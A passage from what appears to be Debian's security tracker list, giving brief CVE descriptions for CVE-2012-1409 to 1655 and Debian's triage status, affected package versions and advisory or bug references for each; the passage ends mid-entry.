CVE-2012-1655 (Unspecified vulnerability in the UC PayDutchGroup / WeDeal payment ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-1654 (Multiple cross-site scripting (XSS) vulnerabilities in the Data module ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-1653 (Cross-site scripting (XSS) vulnerability in the Taxonomy Views ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-1652 (Cross-site scripting (XSS) vulnerability in the Hierarchical Select ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-1651 (Cross-site scripting (XSS) vulnerability in the Submenu Tree module ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-1650 (The ZipCart module 6.x before 6.x-1.4 for Drupal checks the "access ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-1649 (Cool Aid module before 6.x-1.9 for Drupal does not enforce access ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-1648 (Cross-site scripting (XSS) vulnerability in the Cool Aid module before ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-1647 (Multiple cross-site scripting (XSS) vulnerabilities in the "stand ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-1646 (Multiple cross-site scripting (XSS) vulnerabilities in the FAQ module ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-1645 (The CDN module 6.x-2.2 and 7.x-2.2 for Drupal, when running in Origin ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-1644 (The Organic Groups (OG) Vocabulary module 6.x-1.x before 6.x-1.2 for ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-1643 (The Faster Permissions module 7.x-2.x before 7.x-1.2 for Drupal does ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-1642 (includes/linkchecker.pages.inc in the Link checker module 6.x-2.x ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-1641 (The finder_import function in the Finder module 6.x-1.x before ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-1640 (Multiple cross-site scripting (XSS) vulnerabilities in the Managesite ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-1639 (Multiple cross-site scripting (XSS) vulnerabilities in ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-1638 (SQL injection vulnerability in the Search Autocomplete module before ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-1637
	RESERVED
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-1636 (Cross-site request forgery (CSRF) vulnerability in the stickynote ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-1635 (The hook_node_access function in the revisioning module 7.x-1.x before ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-1634 (Cross-site scripting (XSS) vulnerability in video_filter.codecs.inc in ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-1633 (Cross-site request forgery (CSRF) vulnerability in the Password Policy ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-1632 (Cross-site scripting (XSS) vulnerability in password_policy.admin.inc ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-1631 (Cross-site request forgery (CSRF) vulnerability in the Admin:hover ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-1630 (Cross-site scripting (XSS) vulnerability in the Taxonomy Navigator ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-1629 (Cross-site scripting (XSS) vulnerability in the Taxotouch module for ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-1628 (Cross-site scripting (XSS) vulnerability in the SuperCron module for ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-1627 (Cross-site scripting (XSS) vulnerability in vud_term.module in the ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-1626 (SQL injection vulnerability in the conversion form for Events in the ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-1625 (Eval injection vulnerability in the fillpdf_form_export_decode ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-1624 (Multiple cross-site scripting (XSS) vulnerabilities in the Lingotek ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-1623 (The Registration Codes module before 6.x-2.4 for Drupal does not ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-1622
	RESERVED
	NOT-FOR-US: Apache OFBiz
CVE-2012-1621
	RESERVED
	NOT-FOR-US: Apache OFBiz
CVE-2012-1620 (slock 0.9 does not properly handle the XRaiseWindow event when the ...)
	- suckless-tools (unimportant; bug #667796)
CVE-2012-1619
	RESERVED
CVE-2012-1618 (Interaction error in the PostgreSQL JDBC driver before 8.2, when used ...)
	- libpgjava (Even the version in oldstable had 8.2)
CVE-2012-1617 (Directory traversal vulnerability in combine.php in OSClass before ...)
	NOT-FOR-US: OSClass not in Debian
CVE-2012-1616 (Use-after-free vulnerability in icclib before 2.13, as used by Argyll ...)
	- argyll 1.4.0-1
	NOTE: Starting with 1.4.0 argyll includes icclib 2.13, but it's hard to identify the
	NOTE: isolated security fix
CVE-2012-1615 [sectool dbus priv escalation]
	RESERVED
	NOT-FOR-US: sectool
CVE-2012-1614 (Coppermine Photo Gallery before 1.5.20 allows remote attackers to ...)
	NOT-FOR-US: Coppermine
CVE-2012-1613 (Cross-site scripting (XSS) vulnerability in edit_one_pic.php in ...)
	NOT-FOR-US: Coppermine
CVE-2012-1612 (Cross-site scripting (XSS) vulnerability in the update manager in ...)
	- joomla (bug #571794)
CVE-2012-1611 (Joomla! 2.5.x before 2.5.4 does not properly check permissions, which ...)
	- joomla (bug #571794)
CVE-2012-1610 (Integer overflow in the GetEXIFProperty function in magick/property.c ...)
	{DSA-2462-1}
	- imagemagick 8:6.7.4.0-4 (bug #667635)
CVE-2012-1609
	RESERVED
CVE-2012-1608 (The t3lib_div::RemoveXSS API method in TYPO3 4.4.0 through 4.4.13, ...)
	{DSA-2445-1}
	- typo3-src 4.5.14+dfsg1-1
CVE-2012-1607 (The Command Line Interface (CLI) script in TYPO3 4.4.0 through 4.4.13, ...)
	{DSA-2445-1}
	- typo3-src 4.5.14+dfsg1-1
CVE-2012-1606 (Multiple cross-site scripting (XSS) vulnerabilities in the Backend ...)
	{DSA-2445-1}
	- typo3-src 4.5.14+dfsg1-1
CVE-2012-1605 (The Extbase Framework in TYPO3 4.6.x through 4.6.6, 4.7, and 6.0 ...)
	- typo3-src (vulnerable code not yet present)
CVE-2012-1604 (Cross-site scripting (XSS) vulnerability in NextBBS 0.6 allows remote ...)
	NOT-FOR-US: NextBBS
CVE-2012-1603 (Multiple SQL injection vulnerabilities in ajaxserver.php in NextBBS ...)
	NOT-FOR-US: NextBBS
CVE-2012-1602 (user.php in NextBBS 0.6 allows remote attackers to bypass ...)
	NOT-FOR-US: NextBBS
CVE-2012-1601 (The KVM implementation in the Linux kernel before 3.3.6 allows host OS ...)
	{DSA-2469-1}
	- linux-2.6 3.2.17-1 (low)
CVE-2012-1600 [XSS from 5.0.4 release]
	RESERVED
	- phppgadmin 5.0.4-1
	[squeeze] - phppgadmin (Minor issue, will be fixed through a point update)
CVE-2012-1599 (Joomla! 1.5.x before 1.5.26 does not properly check permissions, which ...)
	- joomla (bug #571794)
CVE-2012-1598 (Joomla! 1.5.x before 1.5.26 has unspecified impact and attack vectors ...)
	- joomla (bug #571794)
CVE-2012-1597 (Cross-site scripting (XSS) vulnerability in the textEncode function in ...)
	NOT-FOR-US: eZ Publish
CVE-2012-1596 (The mp2t_process_fragmented_payload function in ...)
	- wireshark 1.6.6-1 (unimportant; bug #666058)
	NOTE: Not suitable for code injection
CVE-2012-1595 (The pcap_process_pseudo_header function in wiretap/pcap-common.c in ...)
	- wireshark 1.6.6-1 (bug #666058)
	[squeeze] - wireshark 1.2.11-6+squeeze7
CVE-2012-1594 (epan/dissectors/packet-ieee80211.c in the IEEE 802.11 dissector in ...)
	- wireshark 1.6.6-1 (unimportant; bug #666058)
	NOTE: Not suitable for code injection
CVE-2012-1593 (epan/dissectors/packet-ansi_a.c in the ANSI A dissector in Wireshark ...)
	- wireshark 1.6.6-1 (unimportant; bug #666058)
	[squeeze] - wireshark 1.2.11-6+squeeze7
	NOTE: Not suitable for code injection
CVE-2012-1592
	RESERVED
	- libstruts1.2-java (Only applies to Struts 2, see bug #657870)
CVE-2012-1591 (The image module in Drupal 7.x before 7.14 does not properly check ...)
	- drupal7 7.14-1 (bug #671402)
CVE-2012-1590 (The forum list in Drupal 7.x before 7.14 does not properly check user ...)
	- drupal7 7.14-1 (bug #671402)
CVE-2012-1589 (Open redirect vulnerability in the Form API in Drupal 7.x before 7.13 ...)
	- drupal7 7.14-1 (bug #671402)
CVE-2012-1588 (Algorithmic complexity vulnerability in the _filter_url function in ...)
	- drupal7 7.14-1 (bug #671402)
CVE-2012-1587
	REJECTED
CVE-2012-1585 (OpenStack Compute (Nova) Essex before 2011.3 allows remote ...)
	- nova 2012-1~rc3-1 (bug #666888)
CVE-2012-1584 (Integer overflow in the mid function in toolkit/tbytevector.cpp in ...)
	- taglib 1.7.1-1 (low; bug #662705)
	[squeeze] - taglib (Minor issue)
CVE-2012-1583 (Double free vulnerability in the xfrm6_tunnel_rcv function in ...)
	- linux-2.6 2.6.22-1
CVE-2012-1582 (Cross-site scripting (XSS) vulnerability in the wikitext parser in ...)
	- mediawiki 1:1.15.5-9 (bug #666269)
CVE-2012-1581 (MediaWiki 1.17.x before 1.17.3 and 1.18.x before 1.18.2 uses weak ...)
	- mediawiki 1:1.15.5-9 (bug #666269)
CVE-2012-1580 (Cross-site request forgery (CSRF) vulnerability in Special:Upload in ...)
	- mediawiki (Vulnerable code not present, see bug #666269)
CVE-2012-1579 (The resource loader in MediaWiki 1.17.x before 1.17.3 and 1.18.x ...)
	- mediawiki (Vulnerable code not present, see bug #666269)
CVE-2012-1578 (Multiple cross-site request forgery (CSRF) vulnerabilities in ...)
	- mediawiki (Vulnerable code not present, see bug #666269)
CVE-2012-1577
	RESERVED
	- dietlibc 0.33~cvs20120325-1 (unimportant)
CVE-2012-1576 (The myuser_delete function in libathemecore/account.c in Atheme 5.x ...)
	NOT-FOR-US: atheme
CVE-2012-1575 (Multiple cross-site scripting (XSS) vulnerabilities in Cumin before ...)
	NOT-FOR-US: cumin
CVE-2012-1574 (The Kerberos/MapReduce security functionality in Apache Hadoop ...)
	- hadoop (bug #535861)
CVE-2012-1573 (gnutls_cipher.c in libgnutls in GnuTLS before 2.12.17 and 3.x before ...)
	{DSA-2441-1}
	- gnutls26 2.12.18-1 (high)
	- gnutls28 3.0.17-2 (high)
CVE-2012-1572
	RESERVED
	- keystone 2012.1~rc2-1
CVE-2012-1571 (file before 5.11 and libmagic allow remote attackers to cause a denial ...)
	{DSA-2422-1}
	- file 5.11-1 (low; bug #664263)
CVE-2012-1570 (The resolver in MaraDNS before 1.3.0.7.15 and 1.4.x before 1.4.12 ...)
	- maradns 1.4.12-1 (bug #665012)
	[squeeze] - maradns 1.4.03-1.1+squeeze1
CVE-2012-1569 (The asn1_get_length_der function in decoding.c in GNU Libtasn1 before ...)
	{DSA-2440-1}
	- libtasn1-3 2.12-1 (high)
CVE-2012-1568 (The ExecShield feature in a certain Red Hat patch for the Linux kernel ...)
	- linux-2.6 (execshield issue)
CVE-2012-1567
	RESERVED
	NOT-FOR-US: LinuxMint
CVE-2012-1566
	RESERVED
	NOT-FOR-US: LinuxMint
CVE-2012-1565 (Unspecified vulnerability in ez Publish 4.1.4, 4.2, 4.3, 4.4, 4.5, and ...)
	NOT-FOR-US: eZ Publish
CVE-2012-1564 (Cross-site scripting (XSS) vulnerability in ...)
	NOT-FOR-US: YVS
CVE-2012-1563
	RESERVED
	- joomla (bug #571794)
CVE-2012-1562
	RESERVED
	- joomla (bug #571794)
CVE-2012-1561
	RESERVED
	NOT-FOR-US: Drupal Finder
CVE-2012-1560
	RESERVED
CVE-2012-1559
	RESERVED
CVE-2012-1558 (yaSSL CyaSSL before 2.0.8 allows remote attackers to cause a denial of ...)
	- cyassl (bug #598391)
	NOTE: https://github.com/cyassl/cyassl/commit/6b77c8967aa34f2a0bae85e90a469c4170cb2bb1
CVE-2012-1557 (SQL injection vulnerability in admin/plib/api-rpc/Agent.php in ...)
	NOT-FOR-US: Parallels Plesk Panel
CVE-2012-1556
	RESERVED
CVE-2012-1555
	RESERVED
CVE-2012-1554
	RESERVED
CVE-2012-1553
	RESERVED
CVE-2012-1552
	RESERVED
CVE-2012-1551
	RESERVED
CVE-2012-1550
	RESERVED
CVE-2012-1549
	RESERVED
CVE-2012-1548
	RESERVED
CVE-2012-1547
	RESERVED
CVE-2012-1546
	RESERVED
CVE-2012-1545 (Microsoft Internet Explorer 6 through 9, and 10 Consumer Preview, ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2012-1544
	REJECTED
CVE-2012-1543 (Unspecified vulnerability in the JavaFX component in Oracle Java SE ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2012-1542
	RESERVED
CVE-2012-1541 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2012-1540
	RESERVED
CVE-2012-1539 (Use-after-free vulnerability in Microsoft Internet Explorer 9 allows ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2012-1538 (Use-after-free vulnerability in Microsoft Internet Explorer 9 allows ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2012-1537 (Heap-based buffer overflow in DirectPlay in DirectX 9.0 through 11.1 ...)
	NOT-FOR-US: DirectX 9.0 in Microsoft Windows
CVE-2012-1536
	RESERVED
CVE-2012-1535 (Unspecified vulnerability in Adobe Flash Player before 11.3.300.271 on ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2012-1534
	REJECTED
CVE-2012-1533 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2012-1532 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2012-1531 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (Specific to Oracle Java, not present in IcedTea)
	- openjdk-7 (Specific to Oracle Java, not present in IcedTea)
	NOTE: Due to the vague disclosure policy by Oracle the exact nature is unknown but since no patch landed in icedtea, we consider it not-affected
CVE-2012-1530 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2012-1529 (Use-after-free vulnerability in Microsoft Internet Explorer 8 and 9 ...)
	NOT-FOR-US: Internet Explorer
CVE-2012-1528 (Integer overflow in Windows Shell in Microsoft Windows XP SP2 and SP3, ...)
	NOT-FOR-US: Microsoft Windows
CVE-2012-1527 (Integer underflow in Windows Shell in Microsoft Windows XP SP2 and ...)
	NOT-FOR-US: Microsoft Windows
CVE-2012-1526 (Microsoft Internet Explorer 6 and 7 does not properly handle objects ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2012-1525 (Heap-based buffer overflow in Adobe Reader and Acrobat 9.x before ...)
	NOT-FOR-US: Adobe Reader
CVE-2012-1524 (Microsoft Internet Explorer 9 does not properly handle objects in ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2012-1523 (Microsoft Internet Explorer 6 through 8 does not properly handle ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2012-1522 (Microsoft Internet Explorer 9 does not properly handle objects in ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2012-1521 (Use-after-free vulnerability in the XML parser in Google Chrome before ...)
	- chromium-browser 18.0.1025.168~r134367-1
CVE-2012-1520 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...)
	NOT-FOR-US: Apple Safari / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-1519
	RESERVED
CVE-2012-1518 (VMware Workstation 8.x before 8.0.2, VMware Player 4.x before 4.0.2, ...)
	NOT-FOR-US: VMware
CVE-2012-1517 (The VMX process in VMware ESXi 4.1 and ESX 4.1 does not properly ...)
	NOT-FOR-US: VMware
CVE-2012-1516 (The VMX process in VMware ESXi 3.5 through 4.1 and ESX 3.5 through 4.1 ...)
	NOT-FOR-US: VMware
CVE-2012-1515 (VMware ESXi 3.5, 4.0, and 4.1 and ESX 3.5, 4.0, and 4.1 do not ...)
	NOT-FOR-US: VMware ESXi
CVE-2012-1514 (Cross-site request forgery (CSRF) vulnerability in VMware vShield ...)
	NOT-FOR-US: VMware vShield Manager
CVE-2012-1513 (The Web Configuration tool in VMware vCenter Orchestrator (vCO) 4.0 ...)
	NOT-FOR-US: VMware vCenter Orchestrator
CVE-2012-1512 (Cross-site scripting (XSS) vulnerability in the internal browser in ...)
	NOT-FOR-US: VMware vSphere
CVE-2012-1511 (Cross-site scripting (XSS) vulnerability in View Manager Portal in ...)
	NOT-FOR-US: VMware View
CVE-2012-1510 (Buffer overflow in the WDDM display driver in VMware ESXi 4.0, 4.1, ...)
	NOT-FOR-US: VMware ESXi
CVE-2012-1509 (Buffer overflow in the XPDM display driver in VMware View before 4.6.1 ...)
	NOT-FOR-US: VMware View
CVE-2012-1508 (The XPDM display driver in VMware ESXi 4.0, 4.1, and 5.0; VMware ESX ...)
	NOT-FOR-US: VMware ESXi
CVE-2012-1507
	RESERVED
CVE-2012-1506
	RESERVED
CVE-2012-1505
	RESERVED
CVE-2012-1504
	RESERVED
CVE-2012-1503
	RESERVED
CVE-2012-1502 (Double free vulnerability in the PyPAM_conv in PAMmodule.c in PyPam ...)
	{DSA-2430-1}
	- python-pam 0.4.2-13
CVE-2012-1501
	REJECTED
CVE-2012-1500
	RESERVED
CVE-2012-1499 (The JPEG 2000 codec (jp2.c) in OpenJPEG before 1.5 allows remote ...)
	- openjpeg (vulnerable code introduced after 1.3)
CVE-2012-1498 (Multiple cross-site request forgery (CSRF) vulnerabilities in Webfolio ...)
	NOT-FOR-US: Webfolio CMS
CVE-2012-1497 (The default configuration of Movable Type before 4.38, 5.0x before ...)
	{DSA-2423-1}
	- movabletype-opensource 5.1.3+dfsg-1
CVE-2012-1496
	RESERVED
CVE-2012-1495
	RESERVED
CVE-2012-1102 [XML::Atom Perl module XML entity expansion]
	RESERVED
	{DSA-2424-1}
	- libxml-atom-perl 0.39-1 (medium)
CVE-2012-1494
	RESERVED
CVE-2012-1493 (F5 BIG-IP appliances 9.x before 9.4.8-HF5, 10.x before 10.2.4, 11.0.x ...)
	NOT-FOR-US: F5 BIG-IP appliances
CVE-2012-1492
	RESERVED
CVE-2012-1491
	RESERVED
CVE-2012-1490
	RESERVED
CVE-2012-1489
	RESERVED
CVE-2012-1488
	RESERVED
CVE-2012-1487
	RESERVED
CVE-2012-1486
	RESERVED
CVE-2012-1485 (Unspecified vulnerability in the NetFront Life Browser ...)
	NOT-FOR-US: NetFront Life Browser for Android
CVE-2012-1484 (Unspecified vulnerability in the WaliSMS CN (cn.com.wali.walisms) ...)
	NOT-FOR-US: WaliSMS CN (cn.com.wali.walisms) application
CVE-2012-1483 (Unspecified vulnerability in the Message Forwarder ...)
	NOT-FOR-US: Message Forwarder for Android
CVE-2012-1482 (Unspecified vulnerability in the TouchPal Contacts ...)
	NOT-FOR-US: TouchPal Contacts for Android
CVE-2012-1481 (Unspecified vulnerability in the Textdroid (com.app.android.textdroid) ...)
	NOT-FOR-US: Textdroid for Android
CVE-2012-1480 (Unspecified vulnerability in the Pansi SMS (com.pansi.msg) application ...)
	NOT-FOR-US: Pansi SMS
CVE-2012-1479 (Unspecified vulnerability in the AContact (com.movester.quickcontact) ...)
	NOT-FOR-US: AContact
CVE-2012-1478 (Unspecified vulnerability in the UCMobile BloveStorm (com.blovestorm) ...)
	NOT-FOR-US: UCMobile BloveStorm
CVE-2012-1477 (Unspecified vulnerability in the Cnectd (mci.cnectd) application 3.1.0 ...)
	NOT-FOR-US: Cnectd
CVE-2012-1476 (Unspecified vulnerability in the KKtalk (com.kkliaotian.android) ...)
	NOT-FOR-US: KKtalk
CVE-2012-1475 (Unspecified vulnerability in the YagattaTalk Messenger ...)
	NOT-FOR-US: YagattaTalk Messenger
CVE-2012-1474 (Unspecified vulnerability in the Youni SMS (com.snda.youni) ...)
	NOT-FOR-US: Youni SMS
CVE-2012-1473
	RESERVED
CVE-2012-1472 (VMware vCenter Chargeback Manager (aka CBM) before 2.0.1 does not ...)
	NOT-FOR-US: VMware vCenter Chargeback Manager
CVE-2012-1471 (Directory traversal vulnerability in catalogue_file.php in ocPortal ...)
	- ocportal (bug #625865)
CVE-2012-1470 (Multiple cross-site scripting (XSS) vulnerabilities in code_editor.php ...)
	- ocportal (bug #625865)
CVE-2012-1469 (Multiple cross-site scripting (XSS) vulnerabilities in Open Journal ...)
	- ojs (low)
	[squeeze] - ojs (Minor issue)
CVE-2012-1468 (Incomplete blacklist vulnerability in Open Journal Systems before ...)
	- ojs (low)
	[squeeze] - ojs (Minor issue)
CVE-2012-1467 (Multiple directory traversal vulnerabilities in the iBrowser plugin ...)
	- ojs (low)
	[squeeze] - ojs (Minor issue)
CVE-2012-1466 (The Traffic Grapher Server for NetMechanica NetDecision before 4.6.1 ...)
	NOT-FOR-US: NetMechanica NetDecision
CVE-2012-1465 (Stack-based buffer overflow in the HTTP Server in NetMechanica ...)
	NOT-FOR-US: NetMechanica NetDecision
CVE-2012-1464 (Dashboard Server for NetMechanica NetDecision before 4.6.1 allows ...)
	NOT-FOR-US: NetMechanica NetDecision
CVE-2012-1463 (The ELF file parser in AhnLab V3 Internet Security 2011.01.18.00, ...)
	NOT-FOR-US: multiple Anti-Virus applications
CVE-2012-1462 (The ZIP file parser in AhnLab V3 Internet Security 2011.01.18.00, AVG ...)
	NOT-FOR-US: multiple Anti-Virus applications
CVE-2012-1461 (The Gzip file parser in AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, ...)
	NOT-FOR-US: multiple Anti-Virus applications
CVE-2012-1460 (The Gzip file parser in Antiy Labs AVL SDK 2.0.3.7, Quick Heal (aka ...)
	NOT-FOR-US: multiple Anti-Virus applications
CVE-2012-1459 (The TAR file parser in AhnLab V3 Internet Security 2011.01.18.00, ...)
	- clamav 0.97.5+dfsg-1 (low; bug #668273)
	[squeeze] - clamav 0.97.5+dfsg-3~squeeze1
CVE-2012-1458 (The Microsoft CHM file parser in ClamAV 0.96.4 and Sophos Anti-Virus ...)
	- clamav 0.97.5+dfsg-1 (low; bug #668273)
	[squeeze] - clamav 0.97.5+dfsg-3~squeeze1
CVE-2012-1457 (The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK ...)
	- clamav 0.97.5+dfsg-1 (low; bug #668273)
	[squeeze] - clamav 0.97.5+dfsg-3~squeeze1
CVE-2012-1456 (The TAR file parser in AVG Anti-Virus 10.0.0.1190, Quick Heal (aka Cat ...)
	NOT-FOR-US: multiple Anti-Virus applications
CVE-2012-1455 (The CAB file parser in NOD32 Antivirus 5795 and Rising Antivirus ...)
	NOT-FOR-US: NOD32 Antivirus, Rising Antivirus
CVE-2012-1454 (The ELF file parser in Dr.Web 5.0.2.03300, eSafe 7.0.17.0, McAfee ...)
	NOT-FOR-US: multiple Anti-Virus applications
CVE-2012-1453 (The CAB file parser in Dr.Web 5.0.2.03300, Trend Micro HouseCall ...)
	NOT-FOR-US: multiple Anti-Virus applications
CVE-2012-1452 (The CAB file parser in Emsisoft Anti-Malware 5.1.0.1, Ikarus Virus ...)
	NOT-FOR-US: multiple Anti-Virus applications
CVE-2012-1451 (The CAB file parser in Emsisoft Anti-Malware 5.1.0.1 and Ikarus Virus ...)
	NOT-FOR-US: multiple Anti-Virus applications
CVE-2012-1450 (The CAB file parser in Emsisoft Anti-Malware 5.1.0.1, Sophos ...)
	NOT-FOR-US: multiple Anti-Virus applications
CVE-2012-1449 (The CAB file parser in NOD32 Antivirus 5795 and Rising Antivirus ...)
	NOT-FOR-US: multiple Anti-Virus applications
CVE-2012-1448 (The CAB file parser in Quick Heal (aka Cat QuickHeal) 11.00, Trend ...)
	NOT-FOR-US: multiple Anti-Virus applications
CVE-2012-1447 (The ELF file parser in Fortinet Antivirus 4.2.254.0, eSafe 7.0.17.0, ...)
	NOT-FOR-US: multiple Anti-Virus applications
CVE-2012-1446 (The ELF file parser in Quick Heal (aka Cat QuickHeal) 11.00, McAfee ...)
	NOT-FOR-US: multiple Anti-Virus applications
CVE-2012-1445 (The ELF file parser in eSafe 7.0.17.0, Rising Antivirus 22.83.00.03, ...)
	NOT-FOR-US: multiple Anti-Virus applications
CVE-2012-1444 (The ELF file parser in eSafe 7.0.17.0, Prevx 3.0, Fortinet Antivirus ...)
	NOT-FOR-US: multiple Anti-Virus applications
CVE-2012-1443 (The RAR file parser in ClamAV 0.96.4, Rising Antivirus 22.83.00.03, ...)
	NOTE: clamav, but upstream evaluated it as invalid (#668273)
CVE-2012-1442 (The ELF file parser in Quick Heal (aka Cat QuickHeal) 11.00, McAfee ...)
	NOT-FOR-US: Multiple Antivirus applications
CVE-2012-1441 (The Microsoft EXE file parser in eSafe 7.0.17.0 and Prevx 3.0 allows ...)
	NOT-FOR-US: eSafe, Prevx
CVE-2012-1440 (The ELF file parser in Norman Antivirus 6.06.12, eSafe 7.0.17.0, CA ...)
	NOT-FOR-US: multiple Antivirus applications
CVE-2012-1439 (The ELF file parser in eSafe 7.0.17.0, Rising Antivirus 22.83.00.03, ...)
	NOT-FOR-US: multiple Antivirus applications
CVE-2012-1438 (The Microsoft Office file parser in Comodo Antivirus 7425 and Sophos ...)
	NOT-FOR-US: multiple Anti-Virus applications
CVE-2012-1437 (The Microsoft Office file parser in Comodo Antivirus 7425 allows ...)
	NOT-FOR-US: Comodo Antivirus 7425
CVE-2012-1436 (The Microsoft EXE file parser in AhnLab V3 Internet Security ...)
	NOT-FOR-US: multiple Anti-Virus applications
CVE-2012-1435 (The Microsoft EXE file parser in AhnLab V3 Internet Security ...)
	NOT-FOR-US: multiple Anti-Virus applications
CVE-2012-1434 (The Microsoft EXE file parser in AhnLab V3 Internet Security ...)
	NOT-FOR-US: multiple Anti-Virus applications
CVE-2012-1433 (The Microsoft EXE file parser in AhnLab V3 Internet Security ...)
	NOT-FOR-US: multiple Anti-Virus applications
CVE-2012-1432 (The Microsoft EXE file parser in Emsisoft Anti-Malware 5.1.0.1, eSafe ...)
	NOT-FOR-US: multiple Anti-Virus applications
CVE-2012-1431 (The ELF file parser in Bitdefender 7.2, Command Antivirus 5.2.11.5, ...)
	NOT-FOR-US: multiple Anti-Virus applications
CVE-2012-1430 (The ELF file parser in Bitdefender 7.2, Comodo Antivirus 7424, eSafe ...)
	NOT-FOR-US: multiple Anti-Virus applications
CVE-2012-1429 (The ELF file parser in Bitdefender 7.2, Comodo Antivirus 7424, ...)
	NOT-FOR-US: multiple Anti-Virus applications
CVE-2012-1428 (The TAR file parser in Quick Heal (aka Cat QuickHeal) 11.00, Norman ...)
	NOT-FOR-US: multiple Anti-Virus applications
CVE-2012-1427 (The TAR file parser in Quick Heal (aka Cat QuickHeal) 11.00, Norman ...)
	NOT-FOR-US: multiple Anti-Virus applications
CVE-2012-1426 (The TAR file parser in Quick Heal (aka Cat QuickHeal) 11.00, Command ...)
	NOT-FOR-US: multiple Anti-Virus applications
CVE-2012-1425 (The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK ...)
	NOT-FOR-US: Multiple Antivirus applications
CVE-2012-1424 (The TAR file parser in Antiy Labs AVL SDK 2.0.3.7, Quick Heal (aka Cat ...)
	NOT-FOR-US: multiple Antivirus applications
CVE-2012-1423 (The TAR file parser in Command Antivirus 5.2.11.5, Emsisoft ...)
	NOT-FOR-US: multiple Antivirus applications
CVE-2012-1422 (The TAR file parser in Quick Heal (aka Cat QuickHeal) 11.00, NOD32 ...)
	NOT-FOR-US: multiple Antivirus applications
CVE-2012-1421 (The TAR file parser in Quick Heal (aka Cat QuickHeal) 11.00, Norman ...)
	NOT-FOR-US: multiple Antivirus applications
CVE-2012-1420 (The TAR file parser in Quick Heal (aka Cat QuickHeal) 11.00, Command ...)
	NOT-FOR-US: multiple Antivirus applications
CVE-2012-1419 (The TAR file parser in ClamAV 0.96.4 and Quick Heal (aka Cat ...)
	- clamav 0.97.5+dfsg-1 (low; bug #668273)
	[squeeze] - clamav 0.97.5+dfsg-3~squeeze1
CVE-2012-1418 (Multiple unspecified vulnerabilities in Google Chrome before ...)
	NOT-FOR-US: Chrome books
CVE-2012-1417
	RESERVED
CVE-2012-1416 (Multiple cross-site request forgery (CSRF) vulnerabilities in ...)
	NOT-FOR-US: SocialCMS
CVE-2012-1415
	RESERVED
CVE-2012-1414 (Cross-site request forgery (CSRF) vulnerability in manager/news.php in ...)
	NOT-FOR-US: Plume CMS
CVE-2012-1413 (Cross-site scripting (XSS) vulnerability in ...)
	NOT-FOR-US: Zen Cart
CVE-2012-1412
	RESERVED
CVE-2012-1411
	RESERVED
CVE-2012-1410 (Multiple cross-site scripting (XSS) vulnerabilities in the History ...)
	- kadu 0.11.0-1
	[squeeze] - kadu (Only affects >= 0.9)
CVE-2012-1409 (Unspecified vulnerability in the Tiny Password ...)
